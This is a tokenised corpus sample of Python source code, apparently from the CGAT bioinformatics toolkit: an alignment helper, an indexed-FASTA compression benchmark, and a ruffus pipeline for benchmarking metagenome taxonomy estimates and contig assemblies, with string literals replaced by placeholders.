<s> """<STR_LIT>""" <EOL> import sys , re , os , tempfile <EOL> def writePairAlignment ( row , col , map_row2col ) : <EOL> """<STR_LIT>""" <EOL> tf = tempfile . TemporaryFile ( "<STR_LIT>" ) <EOL> alignlib . writePairAlignment ( tf , row , col , map_row2col ) <EOL> tf . seek ( <NUM_LIT:0> ) <EOL> r = tf . readlines ( ) <EOL> tf . close ( ) <EOL> return "<STR_LIT>" . join ( r ) <EOL> def writeAlignataCompressed ( map_row2col ) : <EOL> """<STR_LIT>""" <EOL> out = tempfile . TemporaryFile ( "<STR_LIT>" ) <EOL> alignlib . writeAlignataCompressed ( out , map_row2col ) <EOL> out . seek ( <NUM_LIT:0> ) <EOL> r = out . readline ( ) <EOL> out . close ( ) <EOL> return r . split ( "<STR_LIT:\t>" ) </s>
<s> """<STR_LIT>""" <EOL> USAGE = """<STR_LIT>""" <EOL> import tempfile <EOL> import timeit <EOL> import sys <EOL> import os <EOL> from CGAT . IndexedFasta import * <EOL> import CGAT . Stats as Stats <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import Experiment <EOL> parser = optparse . OptionParser ( version = "<STR_LIT>" , usage = globals ( ) [ "<STR_LIT>" ] ) <EOL> parser . set_defaults ( <EOL> methods = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> num_iterations = <NUM_LIT:10> , <EOL> benchmark_num_iterations = <NUM_LIT> , <EOL> fragment_sizes = ( <NUM_LIT> , <NUM_LIT> ) , <EOL> random_access_points = <NUM_LIT> , <EOL> verify_fragment_size = <NUM_LIT:100> , <EOL> verify_num_iterations = <NUM_LIT:0> , <EOL> ) <EOL> ( options , args ) = Experiment . Start ( parser ) <EOL> tempdir = tempfile . mkdtemp ( ) <EOL> options . stdout . write ( "<STR_LIT>" ) <EOL> if options . stdlog >= <NUM_LIT:1> : <EOL> options . stdlog . write ( "<STR_LIT>" ) <EOL> options . stdlog . flush ( ) <EOL> dbfile_uncompressed = tempdir + "<STR_LIT>" <EOL> timer = timeit . Timer ( stmt = "<STR_LIT>" % ( dbfile_uncompressed , str ( args ) , <EOL> options . random_access_points ) , <EOL> setup = "<STR_LIT>" ) <EOL> t = timer . timeit ( number = <NUM_LIT:1> ) <EOL> options . stdout . write ( "<STR_LIT>" % ( t ) ) <EOL> dbfiles = [ ] <EOL> for compression in options . methods : <EOL> if options . stdlog >= <NUM_LIT:1> : <EOL> options . stdlog . write ( "<STR_LIT>" % ( compression ) ) <EOL> options . stdlog . flush ( ) <EOL> dbfile = tempdir + "<STR_LIT:/>" + compression <EOL> timer = timeit . Timer ( stmt = "<STR_LIT>" % ( dbfile , str ( args ) , <EOL> options . random_access_points , <EOL> compression ) , <EOL> setup = "<STR_LIT>" ) <EOL> t = timer . timeit ( number = <NUM_LIT:1> ) <EOL> if options . stdlog >= <NUM_LIT:1> : <EOL> options . stdlog . write ( "<STR_LIT>" % ( compression ) ) <EOL> options . stdlog . 
flush ( ) <EOL> fasta = IndexedFasta ( dbfile ) <EOL> nerrors1 = verify ( IndexedFasta ( dbfile ) , IndexedFasta ( dbfile_uncompressed ) , <EOL> options . verify_num_iterations , options . verify_fragment_size , <EOL> quiet = True ) <EOL> nerrors2 = verify ( IndexedFasta ( dbfile_uncompressed ) , IndexedFasta ( dbfile ) , <EOL> options . verify_num_iterations , options . verify_fragment_size , <EOL> quiet = True ) <EOL> options . stdout . write ( "<STR_LIT>" % ( compression , t , nerrors1 , nerrors2 ) ) <EOL> options . stdout . flush ( ) <EOL> dbfiles . append ( dbfile ) <EOL> options . stdout . write ( "<STR_LIT>" ) <EOL> options . stdout . write ( "<STR_LIT>" % ( "<STR_LIT:\t>" . join ( Stats . DistributionalParameters ( ) . getHeaders ( ) ) ) ) <EOL> options . stdout . flush ( ) <EOL> for fragment_size in options . fragment_sizes : <EOL> times = [ [ ] for x in range ( len ( options . methods ) + <NUM_LIT:1> ) ] <EOL> for iteration in range ( options . num_iterations ) : <EOL> for x in range ( len ( options . methods ) ) : <EOL> if options . stdlog >= <NUM_LIT:1> : <EOL> options . stdlog . write ( "<STR_LIT>" % ( fragment_size , iteration , options . num_iterations , options . methods [ x ] ) ) <EOL> options . stdlog . flush ( ) <EOL> timer = timeit . Timer ( stmt = "<STR_LIT>" % ( fragment_size ) , <EOL> setup = """<STR_LIT>""" % ( dbfiles [ x ] ) ) <EOL> t = timer . timeit ( number = options . benchmark_num_iterations ) <EOL> times [ x ] . append ( t ) <EOL> if options . stdlog >= <NUM_LIT:1> : <EOL> options . stdlog . write ( "<STR_LIT>" % ( fragment_size , iteration , options . num_iterations , "<STR_LIT>" ) ) <EOL> options . stdlog . flush ( ) <EOL> timer = timeit . Timer ( stmt = "<STR_LIT>" % ( fragment_size ) , <EOL> setup = """<STR_LIT>""" % ( dbfile_uncompressed ) ) <EOL> t = timer . timeit ( number = options . benchmark_num_iterations ) <EOL> times [ - <NUM_LIT:1> ] . append ( t ) <EOL> for x in range ( len ( options . 
methods ) ) : <EOL> values = times [ x ] <EOL> options . stdout . write ( "<STR_LIT>" % ( options . methods [ x ] , fragment_size , str ( Stats . DistributionalParameters ( values ) ) , "<STR_LIT:U+002C>" . join ( map ( str , values ) ) ) ) <EOL> values = times [ - <NUM_LIT:1> ] <EOL> options . stdout . write ( "<STR_LIT>" % ( "<STR_LIT>" , fragment_size , str ( Stats . DistributionalParameters ( values ) ) , "<STR_LIT:U+002C>" . join ( map ( str , values ) ) ) ) <EOL> options . stdout . flush ( ) <EOL> Experiment . Stop ( ) </s>
<s> """<STR_LIT>""" <EOL> from ruffus import * <EOL> import time <EOL> import CGAT . Experiment as E <EOL> import logging as L <EOL> import CGAT . Database as Database <EOL> import CGAT . CSV as CSV <EOL> import sys <EOL> import os <EOL> import re <EOL> import shutil <EOL> import itertools <EOL> import math <EOL> import glob <EOL> import time <EOL> import gzip <EOL> import collections <EOL> import random <EOL> import numpy <EOL> import sqlite3 <EOL> import CGAT . GTF as GTF <EOL> import CGAT . IOTools as IOTools <EOL> import CGAT . IndexedFasta as IndexedFasta <EOL> from rpy2 . robjects import r as R <EOL> import rpy2 . robjects as ro <EOL> import rpy2 . robjects . vectors as rovectors <EOL> from rpy2 . rinterface import RRuntimeError <EOL> import CGATPipelines . PipelineMapping as PipelineMapping <EOL> import CGAT . FastaIterator as FastaIterator <EOL> import CGATPipelines . PipelineMapping as PipelineMapping <EOL> import CGATPipelines . PipelineMappingQC as PipelineMappingQC <EOL> import CGAT . Bed as Bed <EOL> import CGAT . Nucmer as Nucmer <EOL> import pysam <EOL> import CGAT . Fastq as Fastq <EOL> import sqlite3 <EOL> import CGATPipelines . PipelineMetagenomeBenchmark as PipelineMetagenomeBenchmark <EOL> import CGATPipelines . PipelineMetagenomeAssembly as PipelineMetagenomeAssembly <EOL> import CGAT . Pipeline as P <EOL> P . getParameters ( <EOL> [ "<STR_LIT>" ] ) <EOL> PARAMS = P . PARAMS <EOL> SEQUENCE_FILES = glob . glob ( "<STR_LIT>" ) + glob . glob ( "<STR_LIT>" ) <EOL> GENOMES = glob . glob ( os . path . join ( PARAMS . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) ) <EOL> CONTIGS = glob . glob ( "<STR_LIT>" ) <EOL> ALIGNMENTS = glob . glob ( "<STR_LIT>" ) <EOL> def dbList ( xset ) : <EOL> '''<STR_LIT>''' <EOL> return "<STR_LIT:(>" + "<STR_LIT:U+002C>" . 
join ( [ "<STR_LIT:'>" + x + "<STR_LIT:'>" for x in xset ] ) + "<STR_LIT:)>" <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ merge ( GENOMES , r"<STR_LIT>" ) <EOL> def buildGiAccessionNumbers ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> for inf in infiles : <EOL> outf . write ( open ( inf ) . readline ( ) . split ( "<STR_LIT:|>" ) [ <NUM_LIT:1> ] + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> @ merge ( [ buildGiAccessionNumbers ] + <EOL> [ os . path . join ( PARAMS . get ( "<STR_LIT>" , "<STR_LIT>" ) , x ) <EOL> for x in [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] ] , <EOL> "<STR_LIT>" ) <EOL> def buildGi2Taxa ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> gi_accessions = infiles [ <NUM_LIT:0> ] <EOL> ncbi_map = infiles [ <NUM_LIT:1> ] <EOL> gi2taxid_map = infiles [ <NUM_LIT:2> ] <EOL> codes = infiles [ <NUM_LIT:3> ] <EOL> nodes = infiles [ <NUM_LIT:4> ] <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( buildGiAccessionNumbers , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadGiAccessionNumbers ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . load ( infile , outfile ) <EOL> @ transform ( SEQUENCE_FILES , regex ( "<STR_LIT>" ) , add_inputs ( buildGi2Taxa ) , r"<STR_LIT>" ) <EOL> def buildTrueTaxonomicRelativeAbundances ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> PipelineMetagenomeBenchmark . buildTrueTaxonomicRelativeAbundances ( <EOL> infiles , outfile ) <EOL> @ jobs_limit ( <NUM_LIT:1> , "<STR_LIT>" ) <EOL> @ transform ( buildTrueTaxonomicRelativeAbundances , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadTrueTaxonomicAbundances ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . load ( infile , outfile ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ transform ( glob . glob ( os . path . join ( os . path . join ( PARAMS . 
get ( "<STR_LIT>" , "<STR_LIT>" ) , "<STR_LIT>" ) , "<STR_LIT>" ) ) , regex ( "<STR_LIT>" ) , r"<STR_LIT>" ) <EOL> def loadEstimatedTaxonomicRelativeAbundances ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . load ( infile , outfile ) <EOL> @ jobs_limit ( <NUM_LIT:1> , "<STR_LIT:R>" ) <EOL> @ transform ( loadTrueTaxonomicAbundances , suffix ( "<STR_LIT>" ) , add_inputs ( loadEstimatedTaxonomicRelativeAbundances ) , "<STR_LIT>" ) <EOL> def plotRelativeAbundanceCorrelations ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PipelineMetagenomeBenchmark . plotRelativeAbundanceCorrelations ( <EOL> infiles , outfile ) <EOL> @ transform ( loadTrueTaxonomicAbundances , suffix ( "<STR_LIT>" ) , add_inputs ( loadEstimatedTaxonomicRelativeAbundances ) , "<STR_LIT>" ) <EOL> def calculateFalsePositiveRate ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PipelineMetagenomeBenchmark . calculateFalsePositiveRate ( infiles , outfile ) <EOL> @ merge ( calculateFalsePositiveRate , "<STR_LIT>" ) <EOL> def mergeFalsePositiveRates ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> header = "<STR_LIT>" <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( header ) <EOL> for inf in infiles : <EOL> for line in open ( inf ) . readlines ( ) : <EOL> outf . write ( line ) <EOL> outf . close ( ) <EOL> @ transform ( mergeFalsePositiveRates , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def plotFalsePositiveRates ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' % <EOL> infile ) <EOL> for i in [ <NUM_LIT:0> , <NUM_LIT:1> ] : <EOL> outf = P . snip ( outfile , "<STR_LIT>" ) + "<STR_LIT>" % i <EOL> R ( '''<STR_LIT>''' % <EOL> i ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' % outf ) <EOL> outf = P . snip ( outfile , "<STR_LIT>" ) + "<STR_LIT>" % i <EOL> R ( '''<STR_LIT>''' % <EOL> i ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' % outf ) <EOL> P . 
touch ( outfile ) <EOL> @ transform ( calculateFalsePositiveRate , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadFalsePositiveRate ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . load ( infile , outfile ) <EOL> @ transform ( loadEstimatedTaxonomicRelativeAbundances , suffix ( "<STR_LIT>" ) , add_inputs ( loadTrueTaxonomicAbundances ) , "<STR_LIT>" ) <EOL> def compareAbundanceOfFalsePositiveSpecies ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename_estimate = P . toTable ( infiles [ <NUM_LIT:0> ] ) <EOL> track = P . snip ( <EOL> os . path . basename ( infiles [ <NUM_LIT:0> ] ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> tablename_true = [ P . toTable ( x ) for x in infiles [ <NUM_LIT:1> : ] if P . snip ( <EOL> os . path . basename ( x ) , "<STR_LIT>" ) == track ] [ <NUM_LIT:0> ] <EOL> dbh = sqlite3 . connect ( "<STR_LIT>" ) <EOL> cc = dbh . cursor ( ) <EOL> tmp = P . getTempFile ( "<STR_LIT:.>" ) <EOL> tmp . write ( "<STR_LIT>" ) <EOL> estimate = { } <EOL> true = set ( ) <EOL> for data in cc . execute ( """<STR_LIT>""" % tablename_estimate ) . fetchall ( ) : <EOL> estimate [ data [ <NUM_LIT:0> ] ] = data [ <NUM_LIT:1> ] <EOL> for data in cc . execute ( """<STR_LIT>""" % tablename_true ) . fetchall ( ) : <EOL> true . add ( data [ <NUM_LIT:0> ] ) <EOL> for taxa , abundance in estimate . iteritems ( ) : <EOL> if taxa in true : <EOL> tmp . write ( "<STR_LIT>" % ( taxa , abundance ) ) <EOL> else : <EOL> tmp . write ( "<STR_LIT>" % ( taxa , abundance ) ) <EOL> tmp . close ( ) <EOL> inf = tmp . name <EOL> if track . find ( "<STR_LIT>" ) != - <NUM_LIT:1> : <EOL> col = "<STR_LIT>" <EOL> elif track . find ( "<STR_LIT>" ) != - <NUM_LIT:1> : <EOL> col = "<STR_LIT>" <EOL> elif track . find ( "<STR_LIT>" ) != - <NUM_LIT:1> : <EOL> col = "<STR_LIT>" <EOL> R ( '''<STR_LIT>''' % <EOL> inf ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' % <EOL> col ) <EOL> R ( '''<STR_LIT>''' % outfile ) <EOL> os . 
unlink ( inf ) <EOL> @ follows ( loadFalsePositiveRate , plotRelativeAbundanceCorrelations ) <EOL> def taxonomy ( ) : <EOL> pass <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ transform ( os . path . join ( PARAMS . get ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> regex ( "<STR_LIT>" ) , <EOL> r"<STR_LIT>" ) <EOL> def buildAssemblyStats ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> assemblers = P . asList ( PARAMS . get ( "<STR_LIT>" ) ) <EOL> dbh = sqlite3 . connect ( infile ) <EOL> cc = dbh . cursor ( ) <EOL> result = { } <EOL> alignment_stats_names = [ ] <EOL> for assembler in assemblers : <EOL> tablename = "<STR_LIT>" % assembler <EOL> for data in cc . execute ( """<STR_LIT>""" % tablename ) . fetchall ( ) : <EOL> track = "<STR_LIT>" % assembler + data [ <NUM_LIT:0> ] <EOL> result [ track ] = list ( data [ <NUM_LIT:1> : ] ) <EOL> alignment_stats_names . append ( track + "<STR_LIT>" ) <EOL> for a in alignment_stats_names : <EOL> a = P . toTable ( a + "<STR_LIT>" ) <EOL> for data in cc . execute ( """<STR_LIT>""" % a ) . fetchall ( ) : <EOL> track = a [ : - len ( "<STR_LIT>" ) ] . replace ( "<STR_LIT>" , "<STR_LIT>" ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> result [ track ] . append ( data [ <NUM_LIT:0> ] ) <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" ) <EOL> for track , results in result . iteritems ( ) : <EOL> assembler = track . split ( "<STR_LIT:_>" ) [ <NUM_LIT:0> ] <EOL> track = track . split ( "<STR_LIT:_>" ) [ <NUM_LIT:1> ] . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> outf . write ( "<STR_LIT:\t>" . join ( [ assembler , track ] + map ( str , results ) ) + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ merge ( glob . glob ( os . path . join ( PARAMS . get ( "<STR_LIT>" ) , "<STR_LIT>" ) ) , <EOL> "<STR_LIT>" ) <EOL> def plotLengthCumProp ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> inf250 = [ x for x in infiles if x . 
find ( "<STR_LIT>" ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> inf150 = [ x for x in infiles if x . find ( "<STR_LIT>" ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> inf100 = [ x for x in infiles if x . find ( "<STR_LIT>" ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> R ( '''<STR_LIT>''' % inf250 ) <EOL> R ( '''<STR_LIT>''' % inf150 ) <EOL> R ( '''<STR_LIT>''' % inf100 ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' % outfile ) <EOL> @ jobs_limit ( <NUM_LIT:1> , "<STR_LIT:R>" ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ transform ( glob . glob ( os . path . join ( PARAMS . get ( "<STR_LIT>" ) , "<STR_LIT>" ) ) , <EOL> regex ( "<STR_LIT>" ) , <EOL> add_inputs ( glob . glob ( os . path . join ( PARAMS . get ( "<STR_LIT>" ) , "<STR_LIT>" ) ) ) , <EOL> r"<STR_LIT>" ) <EOL> def plotCoverageProfile ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> track = P . snip ( os . path . basename ( infiles [ <NUM_LIT:0> ] ) , "<STR_LIT>" ) <EOL> length_file = [ inf for inf in infiles [ <NUM_LIT:1> ] if inf . find ( track ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> R ( '''<STR_LIT>''' % ( infiles [ <NUM_LIT:0> ] , length_file , outfile ) ) <EOL> R [ "<STR_LIT>" ] ( ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ transform ( glob . glob ( os . path . join ( PARAMS . get ( "<STR_LIT>" ) , "<STR_LIT>" ) ) , <EOL> regex ( "<STR_LIT>" ) , <EOL> r"<STR_LIT>" ) <EOL> def countCompleteGenes ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> start = "<STR_LIT>" <EOL> stop = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> ntotal = <NUM_LIT:0> <EOL> nstart = <NUM_LIT:0> <EOL> nstop = <NUM_LIT:0> <EOL> nstart_nstop = <NUM_LIT:0> <EOL> for fasta in FastaIterator . iterate ( IOTools . openFile ( infile ) ) : <EOL> ntotal += <NUM_LIT:1> <EOL> if fasta . sequence . 
startswith ( start ) : <EOL> nstart += <NUM_LIT:1> <EOL> if fasta . sequence [ - <NUM_LIT:3> : len ( fasta . sequence ) ] in stop : <EOL> nstop += <NUM_LIT:1> <EOL> if fasta . sequence . startswith ( start ) and fasta . sequence [ - <NUM_LIT:3> : len ( fasta . sequence ) ] in stop : <EOL> nstart_nstop += <NUM_LIT:1> <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" ) <EOL> outf . write ( "<STR_LIT:\t>" . join ( map ( str , [ ntotal , float ( nstart ) / ntotal , float ( nstop ) / ntotal , float ( nstart_nstop ) / ntotal ] ) ) + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> @ active_if ( "<STR_LIT>" in PARAMS and "<STR_LIT>" in PARAMS [ "<STR_LIT>" ] ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ merge ( glob . glob ( os . path . join ( <EOL> PARAMS . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) ) , <EOL> "<STR_LIT>" ) <EOL> def compareIdbaLengthDistributions ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> l100 = [ inf for inf in infiles if inf . find ( "<STR_LIT>" ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> l150 = [ inf for inf in infiles if inf . find ( "<STR_LIT>" ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> l250 = [ inf for inf in infiles if inf . find ( "<STR_LIT>" ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> R ( '''<STR_LIT>''' % <EOL> l100 ) <EOL> R ( '''<STR_LIT>''' % <EOL> l150 ) <EOL> R ( '''<STR_LIT>''' % <EOL> l250 ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' % outfile ) <EOL> @ active_if ( "<STR_LIT>" in PARAMS and "<STR_LIT>" in PARAMS [ "<STR_LIT>" ] ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ merge ( glob . glob ( os . path . join ( <EOL> PARAMS . 
get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) ) , <EOL> "<STR_LIT>" ) <EOL> def IdbaLengthDistributionStats ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> l100 = [ inf for inf in infiles if inf . find ( "<STR_LIT>" ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> l150 = [ inf for inf in infiles if inf . find ( "<STR_LIT>" ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> l250 = [ inf for inf in infiles if inf . find ( "<STR_LIT>" ) != - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> R ( '''<STR_LIT>''' % <EOL> l100 ) <EOL> R ( '''<STR_LIT>''' % <EOL> l150 ) <EOL> R ( '''<STR_LIT>''' % <EOL> l250 ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' ) <EOL> R ( '''<STR_LIT>''' % outfile ) <EOL> COVERAGE_FILES = glob . glob ( <EOL> os . path . join ( PARAMS . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ transform ( CONTIGS , regex ( "<STR_LIT>" ) , add_inputs ( * COVERAGE_FILES ) , r"<STR_LIT>" ) <EOL> def filterContigsByCoverage ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . submit ( "<STR_LIT>" , "<STR_LIT>" , <EOL> infiles = infiles , outfiles = outfile ) <EOL> @ transform ( filterContigsByCoverage , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def buildFilteredContigStats ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PARAMS [ "<STR_LIT>" ] = None <EOL> PARAMS [ "<STR_LIT>" ] = <NUM_LIT:50> <EOL> PipelineGenomeAssembly . contig_to_stats ( infile , outfile , PARAMS ) <EOL> @ transform ( filterContigsByCoverage , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def buildFilteredContigLengths ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PARAMS [ "<STR_LIT>" ] = None <EOL> PipelineGenomeAssembly . 
build_scaffold_lengths ( infile , outfile , PARAMS ) <EOL> @ transform ( buildFilteredContigLengths , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadFilteredContigLengths ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> outname = P . snip ( os . path . dirname ( infile ) , "<STR_LIT>" ) + "<STR_LIT:_>" + P . snip ( os . path . basename ( infile ) , "<STR_LIT>" ) + "<STR_LIT>" <EOL> P . load ( infile , outname ) <EOL> P . touch ( outfile ) <EOL> @ transform ( buildFilteredContigStats , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadFilteredContigStats ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> P . load ( infile , outfile ) <EOL> def alignmentTargets ( genome_files , contig_files ) : <EOL> '''<STR_LIT>''' <EOL> parameters = [ ] <EOL> for genome , contig in itertools . product ( genome_files , contig_files ) : <EOL> outfile = os . path . join ( "<STR_LIT>" , P . snip ( <EOL> contig , "<STR_LIT>" ) + "<STR_LIT>" + P . snip ( os . path . basename ( genome ) , "<STR_LIT>" ) ) + "<STR_LIT>" <EOL> parameters . append ( [ genome , outfile , contig ] ) <EOL> return parameters <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ files ( alignmentTargets ( GENOMES , CONTIGS ) ) <EOL> def alignContigsToReference ( infile , outfile , param ) : <EOL> '''<STR_LIT>''' <EOL> print infile , param <EOL> to_cluster = True <EOL> reffile , contigfile = infile , param <EOL> pattern = P . snip ( os . path . basename ( outfile ) , "<STR_LIT>" ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> outf = os . path . basename ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( alignContigsToReference , regex ( "<STR_LIT>" ) , r"<STR_LIT>" ) <EOL> def filterAlignments ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . 
run ( ) <EOL> @ transform ( filterAlignments , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def buildAlignmentCoordinates ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( buildAlignmentCoordinates , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def createAlignmentBedFiles ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ merge ( createAlignmentBedFiles , "<STR_LIT>" ) <EOL> def buildAlignmentSizes ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" ) <EOL> for infile in infiles : <EOL> genome = P . snip ( os . path . basename ( infile ) , "<STR_LIT>" ) <EOL> c = <NUM_LIT:0> <EOL> inf = IOTools . openFile ( infile ) <EOL> for bed in Bed . iterator ( inf ) : <EOL> c += bed . end - bed . start <EOL> outf . write ( "<STR_LIT>" % ( genome , str ( c ) ) ) <EOL> outf . close ( ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) ) <EOL> @ transform ( glob . glob ( <EOL> os . path . join ( PARAMS . get ( "<STR_LIT>" , "<STR_LIT>" ) , "<STR_LIT>" ) ) , <EOL> regex ( "<STR_LIT>" ) , <EOL> r"<STR_LIT>" ) <EOL> def collectGenomeSizes ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" ) <EOL> for fasta in FastaIterator . iterate ( IOTools . openFile ( infile ) ) : <EOL> name = P . snip ( os . path . basename ( infile ) , "<STR_LIT>" ) <EOL> length = len ( list ( fasta . sequence ) ) <EOL> outf . write ( "<STR_LIT>" % ( name , str ( length ) ) ) <EOL> outf . close ( ) <EOL> @ merge ( collectGenomeSizes , "<STR_LIT>" ) <EOL> def mergeGenomeSizes ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> all_data = [ ] <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> header = open ( infiles [ <NUM_LIT:0> ] ) . readline ( ) <EOL> outf . 
